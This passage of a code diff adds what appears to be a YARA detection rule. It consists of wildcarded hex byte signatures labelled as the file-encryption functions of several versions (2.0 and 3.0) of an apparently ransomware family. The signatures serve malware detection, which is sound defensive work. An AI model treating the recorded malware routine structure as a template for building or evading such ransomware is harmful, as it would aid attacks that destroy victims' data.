+            08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ??
+            74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45
+            ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ??
+            ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89
+            45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
+        }
+		$v20_1_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ??
+            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00
+            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00
+        }
+		$v20_1_encrypt_file_2 = {
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
+            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
+            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
+            0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
+            84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45
+            ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55
+            ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
+        }
+		$v20_1_encrypt_file_3 = {
+            55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF
+            D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02
+            EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ??
+            ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
+            83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ??
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
+            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85
+            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90
+            ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3
+        }
+		$v30_1_encrypt_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74
+            09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03
+            00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ??
+            ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ??
+            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89
+            45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ??
+            ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ??
+        }
+		$v30_1_encrypt_file_2 = {
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D
+            ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
+            FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ??
+            ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80
+            ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF
+            D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D
+            ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B
+            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45
+            ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D
+            4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00
+        }
+		$v30_1_encrypt_file_3 = {
+            00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88
+            ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B
+            55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1
+            85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85
+            C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ??
+            ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ??
+            ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ??
+            ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
+            74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3
+        }
+		$v30_2_encrypt_file_1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ??
+            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00
+            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
+            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
+            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
+            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
+            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00
+            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
+            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00
+        }
+		$v30_2_encrypt_file_2 = {
+            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
+            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
+            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
+            0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
+            84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
+            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
+            ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F
+            84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ??
+            ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ??
+            33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03
+            4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7
+            45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F
+            84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B
+        }
+		$v30_2_encrypt_file_3 = {
+            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ??
+            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03
+            45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8
+            ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02 EB 05
+            E9 5C FE FF FF 83 7D ?? ?? 74 17 8B 4D ?? 3B 4D ?? 75 0F 8B 55 ?? 3B 55 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
+            88 ?? ?? ?? ?? FF D1 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ??
+            ?? FF D2 83 7D ?? ?? 74 0C 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 7D
+            ?? ?? 75 22 6A ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
+            ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 74 37 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
+            ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ??
+            ?? ?? FF D1 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 45 ?? 5E 8B E5 5D C3
+        }
+		$v30_3_encrypt_file_1 = {
+            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 75 08 8B 45 ?? E9 48 04 00 00 83 7D ?? ?? 75 08 8B 45 ?? E9 3A 04 00
+            00 8B 45 ?? 83 78 ?? ?? 74 11 8B 4D ?? 83 39 ?? 74 09 8B 55 ?? 83 7A ?? ?? 75 08 8B 45 ?? E9 18 04 00 00 C7 45 ?? ?? ??
+            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 6A ?? 8B 55
+            ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B
+            90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 0F 84
+            83 00 00 00 8B 45 ?? 8B 48 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 74 6B 6A ?? 8D 55 ?? 52 8B 45 ?? 8B 48 ??
+            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 39 8B 55 ?? 3B 15 ?? ?? ?? ?? 75 2E 8B 45 ??
+            8B 48 ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 50 ?? FF D2 85 C0 75 0E C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 84 9A 02 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ??
+            8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 63 02 00 00
+            8B 55 ?? 3B 55 ?? 0F 87 57 02 00 00 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3F 02 00 00 6A ?? 6A
+        }
+		$v30_3_encrypt_file_2 = {
+            6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 0B 02 00
+            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 81 E1 ?? ?? ?? ?? 74 1C 6A ?? 6A ?? 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B
